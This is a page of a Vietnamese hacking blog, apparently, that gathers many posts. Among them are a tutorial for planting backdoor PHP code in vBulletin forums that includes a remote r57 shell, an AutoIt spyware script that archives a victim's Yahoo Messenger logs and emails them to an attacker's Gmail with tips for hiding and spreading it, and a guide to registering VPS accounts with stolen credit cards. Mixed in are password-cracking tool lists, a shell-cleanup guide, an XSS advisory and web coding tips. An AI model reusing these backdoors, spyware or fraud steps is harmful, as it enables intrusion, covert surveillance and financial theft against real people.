Trang

[TUT] Hack pass đã lưu trên trình duyệt


Với 3 bước đơn giản có thể lấy pass của nó và theo rõi nó mà nó không bjk

Bước 1:



Bước 2:


Bước 3




Cách này áp dụng với toàn bộ pass trên các trình duyệ

Xem Thêm

 

Phương pháp phát hiện và loại bỏ shell trong Database!

Có nhiều bạn hỏi tôi cách để phát hiện shell khi hacker include vào Database? Hôm nay tôi làm tut này để trả lời câu hỏi trên và giúp các bạn nhận thức thêm về vấn đề bảo mật.
Trước hết ta phải biết cách thức mà hacker include vào Data thế nào thì sau đó mới có phương pháp để loại bỏ triệt để.
Tôi xin nói thêm trong vbb những table có thể lợi dụng để include shell vào là table_template và table_plugin.
Vậy làm thế nào để phát hiện shell khi đã được include vào 2 table này nhỉ?Cách làm như sau:
- Bạn vào Phpadmin của host và search từ khóa

Code:
base64
Và làm theo hướng dẫn như hình sau:
Tại sao ta phải search từ khóa base64 mà không phải là từ khóa khác ?
Xin thưa rằng tất cả các con shell hiện nay nếu không được mã hóa thì sẽ bị antivirut tiêu diệt trừ khi đổi tên file thành file.txt
- Việc còn lại của bạn là mở table khả nghi ra và kiểm tra xem có gì đặc biệt khác thường trong đó không.
Chú ý:
- Đối với table plugin thì bạn có thể delete đi mà không ảnh hưởng gì đến việc hoạt động site.
- Đối với table template nếu bạn thích thì cũng có thể delete còn muốn dùng lại skin đó thì hãy vào admincp rồi nhấn vào revert để vbb tự động edit lại skin cho bạn.
- Bạn có thể áp dụng cách này với những code khác như wordpress, joomla, new, shop, etc…

Xem Thêm

 

Phương pháp include shell trong source VBB và cách phòng chống

Mình viết bài này để giúp tăng cường bảo mật cho forum của các bạn, cho các bạn thấy được cách thức mà hacker đột nhập vào trang web các bạn để từ đó có cách phòng tránh. Mình không khuyến khích các bạn làm theo để thực hiện ý đồ xấu.
Viết tut này cũng có mặt lợi và mặt hại của nó nhưng nếu các bạn biết áp dụng cho mục đích lương thiện thì nó sẽ giúp ích rất nhiều cho bạn

I/Phương diện hacker – upload shell
Bỏ qua phần làm thế nào hacker có shell trên host, mình chỉ nói đến việc hacker đã khai thác file config và hoàn toàn chiếm quyền admin của website bạn. Sau đây mình sẽ liệt kê một cách gần như đầy đủ các phương pháp mà hacker có thể chèn shell và ẩn nó trong forum của bạn để có thể dễ dàng trong những cuộc tấn công tiếp theo. 
Method 1: tạm gọi là up shell qua việc edit teamplate (cách này gần giống với kiều RFI-remote file include)
Bạn lần lượt làm như sau:
Vào admincp –>Plugin manager –>Add new plugin Ở phần HOOK Location bạn chọn là : CACHE_TEMPLATE nhé,
Phần Name: có thể đặt tên tùy ý
Phần plugin php code hãy dùng đoạn code sau để include shell:

Code:
{ 
if($_GET['nameshell']=="heloworld"){ 
include('http://localhost/r57new.php'); 
} 
}
Nhớ kích vào nút đồng ý (yes) để active plugin này nhé .
Bây giờ cùng test nhé ở đây mình test trên localhost.
bạn thêm phần ?nameshell=helloworld vào sau:
index.php hoặc image.php, online.php hay bất cứ file php nào ở ngoài index của host, cái này tùy thuộc vào bạn
Ở đây mình thử với index.php nhé
Method 2: chèn shell bằng cách edit file .php có trong host
Bạn tìm những file mà admin ít để ý để chèn đoạn code sau vào nhé, có thể chèn vào bất cứ đâu mà bạn muốn.
if ($_REQUEST['nameshell']=="helloworld") {  include ("http://localhost/r57new.php");  }
Demo: mình edit file announcement.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.7.2
|| # ---------------------------------------------------------------- # ||
|| # Copyright ©2000-2007 Jelsoft Enterprises Ltd. All Rights Reserved. ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/
if ($_REQUEST['nameshell']=="helloworld") {  include ("http://localhost/r57new.php");  }
// ######################## SET PHP ENVIRONMENT ###########################
error_reporting(E_ALL & ~E_NOTICE);

// ##################### DEFINE IMPORTANT CONSTANTS #######################
define('THIS_SCRIPT', 'announcement');

// #################### PRE-CACHE TEMPLATES AND DATA ######################
// get special phrase groups
$phrasegroups = array(
    'postbit',
    'reputationlevel',
    'posting',
Hưởng thụ thành quả lao động nào
Method 3: là cách import file xml qua plugin
Bạn lần lượt làm như sau:
Plugins & Products –> Download / Upload Plugins –> chọn lấy con shell xml và import vào. (đính kèm ở bài viết)
Bạn có thể mở source file shell xml lên và thay subscriptions.php bằng repair.php hoặc faq.php (bất cứ file .php nào trong admincp mà bạn nghĩ admin site đó sẽ không chú ý đến). Bạn cũng có thể import vào nhiều file cho chắc ăn
cách run shell cũng khá đơn giản là bạn import shell vào file nào thì run file đó thôi chẳn hạn tôi import shell vào file subscriptions.php tôi sẽ run shell như thế này admincp / subscriptions.php làm theo tương tự với những file khác
demo here:
Method 4: import shell qua skin
Bạn lần lượt làm như sau:
Styles & Templates –> Download / Upload Styles –> chọn shell để upload (đính kèm ở bài viết)
Bạn muốn thêm shell vào skin nào thì ở phần Merge Into Style chọn skin đó.
Và đây là kết quả
Cũng cool đó nhỉ ^^!
II/Phương diện webmaster – giải quyết sự cố bị hack
Tiếp sau đây mình xin hướng dẫn các bạn cách clear shell trên host:
- Đầu tiên bạn sẽ phải quan sát thật kĩ xem có file nào lạ không.
- Tiếp theo bạn hãy download source forum về và dùng antivirut để check shell nếu hacker chỉ up shell thông thường lên forum và không dấu nó. Bạn chú ý xem kĩ những folder trong forum như include, modcp …
Nếu shell đã được mã hóa thì anti sẽ không check ra tốt nhất là nên up một source forum mới lên thay thế source forum cũ.
- Đối vời shell được chèn vào database và source thì tùy theo từng dạng ta có phương pháp phòng chống riêng
+ Method 1: đợi suy nghĩ xong rồi post tiếp
+ Method 2: upload new source như đã nói ở trên.
+ Method 3: bạn vào Plugin Manager bạn bắt đầu tìm với cột Hook Location nếu tìm thấy phần nào có init_startup thì đó chính là con shell mà hacker đã include vào
+ Method 4: remove skin bị đính kèm shell
Bài viết có sử dụng tư liệu của mafia_boy,quang hùng, ly0kha, alucar,meoconx …

Xem Thêm

 

Một số công cụ xem Password


Vận dụng tính năng lưu lại các password của các phần mềm, các công cụ sau sẽ giúp ta lấy lại các mật khẩu này:

IE Passview
- Hỗ trợ IE7
- Recovery password lưu trữ trên IE gồm: AutoComplete, HTTP Authentication, FTP
Download


Mail PassView
Xem và Export Password account Outlook Express, MS Outlook, Windows Mail,…
Download


PstPassword
Password Outlook .PST file
Download


WirelessKeyView
Download


Dialupass
Xem password Dialup/RAS/VPN
Download


Revelation
Công cụ hiển thị các password trực tiếp trên các textbox (dấu *)
Download
Trả lời với trích dẫn

Xem Thêm

 

Một số công cụ "hack" miễn phí


Một số công cụ "hack" miễn phí

Nếu bạn là người ưa thích tìm hiểu, khám phá về phần mềm và những lĩnh vực có liên quan, chắc chắn sẽ phải cần đến bộ tổ hợp công cụ dùng để hack. Trong bài viết dưới đây, chúng tôi sẽ giới thiệu với các bạn một số chương trình hỗ trợ trực tuyến khá phổ biến và được nhiều người sử dụng.

1. Date Cracker 2000:

Date Cracker 2000 là 1 chương trình hỗ trợ có thể giúp người dùng xóa bỏ chế độ bảo vệ chương trình có liên quan đến thời gian sử dụng. Cách thức này rất có ích với những phần mềm có thời hạn dùng thử, cụ thể khi tiến hành áp dụng bằng Data Cracker 2000 thì trên chương trình đó của bạn sẽ hiển thị thông tin như There are 90 days remaining in your trial period. Nhưng đối với những ứng dụng được áp dụng kỹ thuật bảo vệ quá kỹ càng thì cách này không thực hiện được.

2. Advanced Port Scanner:

Đây là 1 tiện ích nhỏ gọn, với dung lượng vô cùng bé, tốc độ hoạt động nhanh chóng với chức năng chính là quét các cổng đang hoạt động trên hệ thống. Tất cả những gì bạn cần làm là điền địa chỉ IP của máy tính cần kiểm tra, chương trình sẽ lập tức liệt kê và hiển thị cụ thể những thông tin trên từng cổng:


[IMG][/IMG]

3. Ophcrack:


Ứng dụng đầy “sức mạnh” này có thể dễ dàng bẻ khóa hoặc khôi phục bất cứ mật khẩu nào đối với người sử dụng hệ điều hành Windows.

4. RAR Password Cracker:

Đây chắc chắn là công cụ không thể thiếu đối với bất kỳ người sử dụng nào, với khả năng có thể tìm và bẻ khóa bất kỳ mật khẩu bảo vệ nào của file RAR.

5. PC Activity Monitor:

Với cơ chế hoạt động vô cùng nhẹ nhàng nhưng cũng rất hiệu quả, PC Activity Monitor gần như không gây ra bất kỳ ảnh hưởng nào đến hệ điều hành, do vậy rất phù hợp với những mô hình hệ thống với số lượng máy tính bất kỳ. Chức năng chính của PC Activity Monitor là giám sát và thu thập toàn bộ thông tin của người dùng trên máy tính, và tất cả những thông tin dữ liệu này đều được mã hóa thành file log duy nhất, sau đó sẽ được gửi đến địa chỉ email bí mật của người điều khiển đã thiết lập trước đó.


6. Cain & Abel:

Nếu muốn khôi phục mật khẩu của các tài khoản sử dụng trong hệ điều hành của Microsoft, các bạn hãy dùng Cain & Abel. Dễ dàng bắt các gói dữ liệu được truyền tải qua hệ thống mạng, bẻ khóa mật khẩu dựa vào phương pháp Dictionary, Brute – Force và Cryptanalysis, ghi lại các đoạn hội thoại VoIP...

[IMG][/IMG]

7. SpyRemover Pro 3.05:

Với khả năng nhận dạng và tiêu diệt tới hơn 140.000 loại chương trình độc hại khác nhau, bao gồm: virus, spyware, adware, trojan... đây chắc chắn là công cụ bảo mật hỗ trợ không thể thiếu dành cho bất kỳ người sử dụng Windows nào.

[IMG][/IMG]

[LEFT]8. Nikto:

Đây là 1 hệ thống web server mã nguồn mở - Open Source (GPL) có khả năng thực hiện các cuộc kiểm tra toàn diện đối với nhiều thành phần hỗ trợ khác nhau, bao gồm hơn 3500 file dữ liệu với mức độ nguy hiểm khác nhau, tương thích với hơn 900 phiên bản server...

9. SuperScan:

[IMG][/IMG]

10. Yersinia:

Là 1 công cụ phục vụ trong các hệ thống mạng, nền tảng kỹ thuật vững chắc để kiểm tra, đánh giá và phân tích những hệ thống mạng ảo, qua đó dễ dàng xây dựng và đánh giá những thành phần cần thiết khi đưa vào áp dụng thực tế.

[IMG][/IMG]

11. PuTTY:

PuTTY là trong cổng SSH client để kết nối tới chuẩn Nokia 9200 Communicator, phiên bản hiện tại của ứng dụng bao gồm một số dịch vụ hỗ trợ giao thức SSH, bộ giả lập câu lệnh Terminal và giao diện dòng lệnh quen thuộc với người sử dụng.

[IMG][/IMG]

12. Nessus:

Với chức năng chính là rà soát để phát hiện các lỗ hổng an ninh trong các hệ thống và ứng dụng, tự động kiểm tra cấu hình, phát hiện và khôi phục dữ liệu, phân tích và báo cáo cụ thể về tình hình bảo mật hiện thời. Hiện tại, Nessus được phân phối tùy theo yêu cầu của khách hàng và quy mô cụ thể của từng hệ thống.

[IMG][/IMG]

13. Hping:

Đây là 1 công cụ phân tích gói dữ liệu TCP/IP dựa trên giao diện dòng lệnh, được chia theo 8 chức năng cụ thể khác nhau, không chỉ hỗ trợ việc gửi thông tin ICMP tới cho các thành phần yêu cầu trong hệ thống, Hping còn hỗ trợ các giao thức khác như TCP, UDP, ICMP và RAW-IP.

14. coWPAtty:

Chức năng chính của coWPAtty khi hoạt động trong bất kỳ hệ thống nào là kiểm tra và đảm bảo độ bảo mật, an toàn của những thành phần được chia sẻ đối với hệ thống WiFi Protected Access (WPA).

[IMG][/IMG]

15. DumpAutoComplete v0.7:
Ứng dụng này có khả năng tìm kiếm phần profile mặc định trong Firefox của tài khoản người dùng đã từng sử dụng công cụ và có tác động đến bộ phận cache AutoComplete của định dạng XML. Bên cạnh đó, những file AutoComplete có thể được gửi tới một số chương trình để phân tích. Điểm mạnh của công cụ này là hiểu được hầu hết cách thức hoạt động của hệ thống dựa trên các file autocomplete (với Firefox 1.x) cũng như dữ liệu lưu trữ dựa vào SQLite (Firefox 2.x).

Chúc các bạn thành công!

Xem Thêm

 

[TUT] VPS Win/Linux UK Chất

Nguyên liệu: CCV live là được, sock VN cũng reg được nhưng tốt nhất là trùng state.
Max cấu hình là 32GB RAM, 8 CPUs:
Có thể tạo được tối đa 10 VPS/ 1 account cloud.

 
Site:  http://www.rackspace.com/
Nó sẽ auto call đếnđọc 4 số PIN, nhập đúng 4 số đấy là activate được acc. Chỗ add CCV thì add con nào live là được, ko cần balance nhiều.

Sau khi activate acc, AE vào đây làm theo hướng dẫn của nó: Comment  !

Xem Thêm

 

Các lỗi thường gặp khi viết mã HTML và CSS



Dưới đây là các lỗi thường gặp khi viết mã HTML & CSS mà bạn cần chú ý để có thể validate HTML và CSS

HTML - Sai DOCTYPE
DOCTYPE sẽ nói cho trình duyệt loại mã HTML mà trang web sử dụng, ở HTML 4.01 có 3 loại DOCTYPE chính:

  • HTML 4.01 Strict
  • HTML 4.01 Transitional
  • HTML 4.01 Frameset

Bạn có thể tìm hiểu thêm về DOCTYPE trên w3schools

HTML - Sử dụng id giống nhau
Trên một trang web, class có thể dùng nhiều lần nhưng bạn chỉ được dùng id cho 1 element riêng. Điều này đặc biệt quan trọng khi áp dụng javascript, ajax.

Sử dụng sai:

Code:
<div id="idabc">Information</div> <div id="idabc">Other information</div>
Sử dụng đúng:

Code:
<div id="infomation">Information</div> <div id="otherinfo">Other information</div>
HTML - Đóng thẻ không đúng thứ tự
Việc đóng thẻ đúng thứ tự là rất quan trọng, ví dụ thẻ div chỉ được đóng sau khi tất cả các thẻ trong nó đóng

Sử dụng sai:
Code:
<div><strong>Information</div></strong>
Sử dụng đúng:
Code:
<div><strong>Information</strong></div>

HTML - Viết hoa các tags
Bạn sẽ không validate được mã HTML của mình nếu viết như sau
Code:
<DIV></DIV>

HTML - Sử dụng style ngay trên thẻ (inline style)
Sử dụng style ngay trong thẻ HTML bao giờ cũng nhanh hơn việc đưa chúng vào file CSS riêng, nhưng việc đó làm cho bạn rất vất vả khi thay đổi các thẻ giống nhau và khó gỡ lỗi
Code:
<a href="link.html" style="color: #000; text-decoration: none;">link name</a>
HTML - Sử dụng các kí tự đặc biệt
Hãy chắc chắn rằng bạn sử dụng ký tự đặc biệt đúng cách trong mã HTML vì không phải lúc nào trình duyệt cũng có thể hiểu và xử lý chúng

Sử dụng sai:
Code:
<p> ©, & Stuff</p>
Sử dụng đúng:
Code:
<p>&copy;, &amp; Stuff</p>

HTML - Sử dụng header là ảnh
Khi trong thiết kế có những font không có trong hệ thống, thì bạn cũng không nên dùng như sau:
Code:
<img src="Header.jpg"  alt="Header title" />
Cách sử dụng đúng phải là kết hợp với CSS:
Code:
<h1 class="header">Header Title</h1>
Và style cho header:

Code:
h1.Header{     /*     Mã CSS để ẩn text và hiện background     */ }
HTML - Không có thuộc tính alt
Tại sao phải thêm alt vào trong thẻ img khi không hề có khác biệt? Alt sẽ giúp người đọc xem được thông tin về ảnh khi họ không tải được ảnh đó, nó còn giúp các bộ máy tìm kiếm hiểu bức ảnh hơn (SEO)

Sử dụng sai:
Code:
<img src="image.jpg"  />
Sử dụng đúng:

Code:
<img src="image.jpg"  alt="image alt tag" />
CSS - Không sử dụng cách viết tắt
Code:
border-top:1px solid #00f;  border-right:1px solid #00f;  border-bottom:1px solid #00f;  border-left:1px solid #00f;
Khi cả 4 border như nhau, tại sao bạn không dùng:
Code:
border:1px solid #00f;
CSS - Sử dụng đơn vị cho giá trị bằng 0
Bạn không cần phải điền đơn vị cho các giá trị bằng 0 vì 0px, 0pt, 0em đều bằng nhau.

Code:
/* Thay vì */ padding:0px 0px 5px 0px; /* Bạn nên dùng */ padding:0 0 5px 0;
CSS - Sử dụng mã màu
Bạn có thể khai báo dùng màu 'white', 'black', 'red'... nhưng tốt nhất hãy cho trình duyệt biết chính xác màu hiển thị bằng cách sử dụng mã màu. Và với các mã màu lặp lại như #ffffff, #000000 bạn cũng có thể viết tắt thành #fff hoặc #000
Code:
color: #000; color: #e6a; /* Tương đương với màu #ee66aa */
CSS - Sử dụng sai Position
Khi bạn mới bắt đầu học CSS thì position khá khó hiểu. Bạn có thể sử dụng: static, relative, absolute và fixed. Giá trị mặc định của position là static. Bạn có thể xem cách sử dụng chi tiết tại w3school


Tham khảo ntuts

Xem Thêm

 

PHP - Những điều có thể bạn chưa biết

Thủ thuật khi lập trình PHP
1- Khi echo thay thế print:

Echo luôn luôn hoạt động nhanh hơn print, vì echo không có return gì cả, trong khi print thì luôn return true hay false ( 0 | 1)



<?php
print('Hello, xxxx');

echo "Hello, xxxx";
?>

2- Nháy đơn luôn nhanh hơn nháy kép:
Xét ví dụ sau:

<?php
$abc = 'bbb';
$a = 'abcdef'. $abc;
$b = "abcdef $abc";
?>
Vì nháy kép luôn kiểm tra nội dung bên trong có cái nào là biến hay không. Trong khi nháy đơn thì không kiểm tra, vì nội dung bên trong nháy đơn chắc chắn là chuỗi.


3- Vòng lặp for trong PHP
Mỗi khi thực hiện vòng lặp for() để duyệt một phần tử mảng. Ta thường sử dụng hàm count để đếm số lượng của các phần tử trong mảng. Điều này sẽ làm cho ứng dụng của chúng ta trở nên chậm chạp. Vì lý do mỗi lần thực hiện việc kiểm tra điều kiền thì ta lại phải gọi lại hàm count để đếm số phần tử trong mảng.
Cụ thể:

<?php
for($i=0; $i<=count($a); $i++){
// Hành Động...
}
?>
Cải tiến:

<?php$b = count($a);
for($i=0; $i<=$b; $i++){
// Hành động...
}

?>
4- Đừng back folder khi gọi lại file:
Thói quen back folder của một số lập trình viên cần phải xem xét lại vì. Khi back folder. Hệ thống phải cần thời gian tìm kiếm và định hình đường dẫn. Điều đó sẽ làm cho ứng dụng tốn tài nguyên trong việc thực hiện thao tác này.
Cụ thể:
<?php
include '../../path/a.php';

?>
mã cải tiến

<?php
include BASE.'/path/a.php';

?>
BASE là 1 hằng được định nghĩa từ đầu để chỉ ra đường dẫn vật lý tới thư mục của ứng dụng.

5- Nối chuỗi bằng dấu "," sẽ nhanh hơn dấu "."
Thói quen khi lập trình PHP thường là nối chuỗi và biến bằng dấu “.”. Nhưng thực tế là khi nối chuỗi bằng dấu “,” thì tốc độ xử lý của ứng dụng sẽ được cải tiến và nhanh hơn rất nhiều. Tác giả của bài viết này cũng đã thực hiện ứng dụng để chứng minh điều đó.
http://www.electrictoolbox.com/php-e...concatenation/

<?php
echo $str1 . $str2;
echo $str1 , $str2; // Nhanh hơn

?>
6- Luôn dùng dấu nháy để truy cập khóa của 1 mảng:
Thực tế là các lập trình viên hay bỏ qua điều này vì sự rườm rà của cách viết. Nhưng nếu không có nó thì ứng dụng sẽ lại chậm đi một chút. Vì khi đó nó sẽ xem khóa đó là 1 hằng, và tìm xem có hằng nào định nghĩa hay ko? như vậy sẽ làm code chạy chậm đi do phải mất thời gian xử lý tác vụ biên dịch hằng.
Ví dụ:
<?php
$a = $b['abc']; // nhanh hơn


$a = $b[abc];

?>

Xem Thêm

 

Theo dõi nội dung Y!M của người khác từ xa

Như các bạn đã biết Y!m có một chế độ Lưu trữ tin nhắn "Message Archive" và thiết lập mặc định của chức năng này là Lưu trữ và xóa mỗi khi thoát Y!m. Vì thế chúng ta sẽ lợi dụng khe hở này để trộm nội dung chat.

Các tin nhắn này được lưu trữ trong thư mục sau :




%ProgramFiles%\Yahoo!\Messenger\Profiles\[username]\[đối tượng]

 vì thế mọi việc chúng ta cần làm là steal thư mục này và gửi cho attacker.
(dir có thể thay đổi tùy vào người sử dụng)

Thứ nhất : Stealing Method
+ Nén lại dưới dạng ZIP - RAR - 7Z (tùy bạn chọn)
+ Lưu trữ ở một địa điểm nhất định nào đó.

Các người dùng máy tính VN ngày nay ai chả có cài WinRAR, nên Eric giới thiệu cách nén chạy bằng commandLine này nhé.
Chủ yếu các bạn cần shell 1 command line dưới nền DOS ẩn.
Chủ thích giá trị : <1> : đường dẫn đến winrar (thường là C:\Program Files\Winrar\Winrar.exe)
<2> : đường dẫn đến file sẽ được tạo
<3> : root archive đã nói ở trên.

Syntax :

<1> a -ibck <2> <3>

Ví dụ trên AuToIT :

_RunDOS ("C:\PROGRA~1\WinRAR\winrar a -ibck C:\Progra~1\WinRAR\test.rar C:\PROGRA~1\Yahoo!\Messenger\Profiles\eric.walter13")


Nhớ include au3 vào nhé.

Dòng lệnh trên tạo cho chúng ta một file Test.rar chứa root eric.walter13
Thế là xong bước 1

Thứ 2 : Send qua Email (Eric mượn source của autoitscript.com nhé)


;##################################
; Include
;##################################
#Include
#include
;##################################
; Variables
;##################################
$SmtpServer = "smtp.gmail.com" ; address for the smtp-server to use - REQUIRED
$FromName = "Name" ; name from who the email was sent
$FromAddress = "nghquang812@gmail.com" ; address from where the mail should come
$ToAddress = "nghquang812@gmail.com" ; destination address of the email - REQUIRED
$Subject = "Userinfo" ; subject from the email - can be anything you want it to be
$Body = "" ; the messagebody from the mail - can be left blank but then you get a blank mail
$AttachFiles = "C:\Program Files\WinRAR\test.rar" ; the file you want to attach- leave blank if not needed
$CcAddress = "" ; address for cc - leave blank if not needed
$BccAddress = "" ; address for bcc - leave blank if not needed
$Importance = "Normal" ; Send message priority: "High", "Normal", "Low"
$Username = "nghquang812@gmail.com" ; username for the account used from where the mail gets sent - REQUIRED
$Password = "*************" ; password for the account used from where the mail gets sent - REQUIRED
;$IPPort = 25 ; port used for sending the mail
$ssl = 1 ; enables/disables secure socket layer sending - put to 1 if using httpS
$IPPort=465 ; GMAIL port used for sending the mail
;~ $ssl=1 ; GMAILenables/disables secure socket layer sending - put to 1 if using httpS
;##################################
; Script
;##################################
func sendEmail()
Global $oMyRet[2]
Global $oMyError = ObjEvent("AutoIt.Error", "MyErrFunc")
$rc = _INetSmtpMailCom($SmtpServer, $FromName, $FromAddress, $ToAddress, $Subject, $Body, $AttachFiles, $CcAddress, $BccAddress, $Importance, $Username, $Password, $IPPort, $ssl)
If @error Then
MsgBox(0, "Error sending message", "Error code:" & @error & " Description:" & $rc)
EndIf
endfunc
;
; The UDF
Func _INetSmtpMailCom($s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress, $s_Subject = "", $as_Body = "", $s_AttachFiles = "", $s_CcAddress = "", $s_BccAddress = "", $s_Importance="Normal", $s_Username = "", $s_Password = "", $IPPort = 25, $ssl = 0)
Local $objEmail = ObjCreate("CDO.Message")
$objEmail.From = '"' & $s_FromName & '" <' & $s_FromAddress & '>'
$objEmail.To = $s_ToAddress
Local $i_Error = 0
Local $i_Error_desciption = ""
If $s_CcAddress <> "" Then $objEmail.Cc = $s_CcAddress
If $s_BccAddress <> "" Then $objEmail.Bcc = $s_BccAddress
$objEmail.Subject = $s_Subject
If StringInStr($as_Body, "<") And StringInStr($as_Body, ">") Then
$objEmail.HTMLBody = $as_Body
Else
$objEmail.Textbody = $as_Body & @CRLF
EndIf
If $s_AttachFiles <> "" Then
Local $S_Files2Attach = StringSplit($s_AttachFiles, ";")
For $x = 1 To $S_Files2Attach[0]
$S_Files2Attach[$x] = _PathFull($S_Files2Attach[$x])
ConsoleWrite('@@ Debug(62) : $S_Files2Attach = ' & $S_Files2Attach & @LF & '>Error code: ' & @error & @LF) ;### Debug Console
If FileExists($S_Files2Attach[$x]) Then
$objEmail.AddAttachment ($S_Files2Attach[$x])
Else
ConsoleWrite('!> File not found to attach: ' & $S_Files2Attach[$x] & @LF)
SetError(1)
Return 0
EndIf
Next
EndIf
$objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
$objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpserver") = $s_SmtpServer
If Number($IPPort) = 0 then $IPPort = 25
$objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = $IPPort
;Authenticated SMTP
If $s_Username <> "" Then
$objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
$objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendusername") = $s_Username
$objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendpassword") = $s_Password
EndIf
If $ssl Then
$objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = True
EndIf
;Update settings
$objEmail.Configuration.Fields.Update
; Set Email Importance
Switch $s_Importance
Case "High"
$objEmail.Fields.Item ("urn:schemas:mailheader:Importance") = "High"
Case "Normal"
$objEmail.Fields.Item ("urn:schemas:mailheader:Importance") = "Normal"
Case "Low"
$objEmail.Fields.Item ("urn:schemas:mailheader:Importance") = "Low"
EndSwitch
$objEmail.Fields.Update
; Sent the Message
$objEmail.Send
If @error Then
SetError(2)
Return $oMyRet[1]
EndIf
$objEmail=""
EndFunc ;==>_INetSmtpMailCom
;
;
; Com Error Handler
Func MyErrFunc()
$HexNumber = Hex($oMyError.number, 8)
$oMyRet[0] = $HexNumber
$oMyRet[1] = StringStripWS($oMyError.description, 3)
ConsoleWrite("### COM Error ! Number: " & $HexNumber & " ScriptLine: " & $oMyError.scriptline & " Description:" & $oMyRet[1] & @LF)
SetError(1); something to check for when this function returns
Return
EndFunc ;==>MyErrFunc


Đoạn code trên sẽ gửi một email đính kèm file Test.rar vào email và gửi đến cho attacker : nghquang812@gmail.com. Các thiết lập SMTP các bạn tùy chỉnh cho từng email nhé.

Thứ 3 : Màu mè

+ Cho code chạy trong 1 khoảng x thời gian - while 1 (autoit)
+ Lây lan : tùy thích
+ Chạy nền : tùy thích
+ Ẩn : đặt tên giống file hệ thống, nhân bản...

Các bạn chịu khó màu mè thì sản phẩm ra mới ngọt được nhé.


các bạn vào trang http://ymdecoder.com để giải mã file dat nhé.
Chúc các bác thành công


Eric Walter.

Ghi chu

$AttachFiles = "C:\Program Files\WinRAR\test.rar"

có thể thay bằng:

$AttachFiles = RegRead("HKEY_LOCAL_MACHINE\Software\WinRAR", Mod("exe32",3,1)) & "test.rar"


phòng trường hợp winRAR đc cài trên ổ khác.

- Nên sử dụng Dll vbzip11.dll thay vì dùng winRAR, dễ bị lộ khi nó nén file( ko biết có đúng không)

Xem Thêm

 

Cross-site Scripting Vulnerability in WordPress GD Star Rating Plugin

Vector: Remote
Severity: Low
Patch: Unpatched
Impact: Cross-site Scripting (XSS)
Software: WordPress GD Star Rating Plugin 1.x , vulnerable versions: <=1.9.7
A cross-site scripting (XSS) vulnerability has been discovered in WordPress GD Star Rating Plugin.
An input validation error exists in wp-content/plugins/gd-star-rating/widgets/widget_top.php while processing the data passed to the parameter "wpfn". A remote attacker can send a specially crafted HTTP request to the vulnerable application and execute arbitrary html and scripting code in user`s browser in context of a vulnerable website.
Further exploitation of this vulnerability may result in stealing potentially sensitive to the user information, such as cookies, or disguising the information presented on the website.

Demo:
Click here to view!

Xem Thêm

 

Cách nhận biết tài khoản Gmail, Yahoo, FB bị người khác sử dụng

Việc bảo mật các thông tin và tài khoản cá nhân khi sử dụng internet luôn là vấn đề được coi trọng. Tuy nhiên đôi khi vì nhiều lý do nào đó, các tài khoản Gmail, Yahoo hay Facebook của bạn bị lộ mật khẩu và bị một kẻ lạ mặt ghé thăm, tuy nhiên không để lộ dấu vết gì. Nếu may mắn bạn hoàn toàn có thể kịp thời phát hiện và ngăn chặn các hành vi đăng nhập trái phép này. Chỉ với một vài thủ thuật nhỏ, bạn có thể phát hiện có người đã sử dụng tài khoản Gmail, Yahoo hay Facebook của mình.

Gmail
Đăng nhập vào tài khoản Gmail của bạn, kéo xuống dưới cùng và để ý dòng Hoạt động tài khoản gần đây nhất (Last account activity). Hãy click vào mục Chi tiết (Details).

Một danh sách hoạt động tài khoản Gmail của bạn sẽ được hiển thị, bao gồm cả thời gian và địa chỉ IP đăng nhập. Do đó, bạn có thể dễ dàng phát hiện nếu có ai đó sử dụng máy tính khác để đăng nhập vào tài khoản Gmail của bạn. Tuy nhiên nếu bạn không chắc chắn rằng mình có sử dụng máy tính khác để đăng nhập tài khoản Gmail hay không, bạn có thể chọn Đăng xuất tất cả các phiên bản (Sign out all other sessions) và thay đổi mật khẩu để đảm bảo an toàn.

Yahoo
Để theo dõi các hoạt động của bạn trong tài khoản Yahoo! Mail, bạn chỉ cần đăng nhập vào tài khoản Yahoo Mail, click vào tên đăng nhập của bạn ở góc trên bên trái và chọn mục Thông tin tài khoản (Account Information). Bạn sẽ phải đăng nhập một lần nữa để đến trang thông tin cá nhân của mình.

Tại đây, kéo xuống mục Đăng nhập và bảo mật (Sign-In and Security) và chọn Xem hoạt động đăng nhập gần đây (View your recent sign-in activity). Tại đây bạn cũng có thể xem danh sách các hoạt động đăng nhập vào tài khoản Yahoo của bạn theo thời gian và địa chỉ IP, hiển thị cả hoạt động đăng nhập vào Yahoo Mail và Yaho Messenger.

Facebook
Trong tài khoản Facebook của bạn, click vào mũi tên bên cạnh tên tài khoản và chọn mục Account Settings, tiếp tục chọn Security, trong danh sách bên phải chọn Edit của mục Active Sessions.

Tại đây sẽ hiển thị danh sách các lần đăng nhập tài khoản Facebook của bạn theo thời gian và địa chỉ, bạn có thể chỉ chuột vào địa chỉ bên cạnh Location để xem IP đăng nhập. Bạn cũng có thể chọn End Activity để đăng xuất tài khoản từ các địa chỉ khác.

Nguồn genk.vn

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương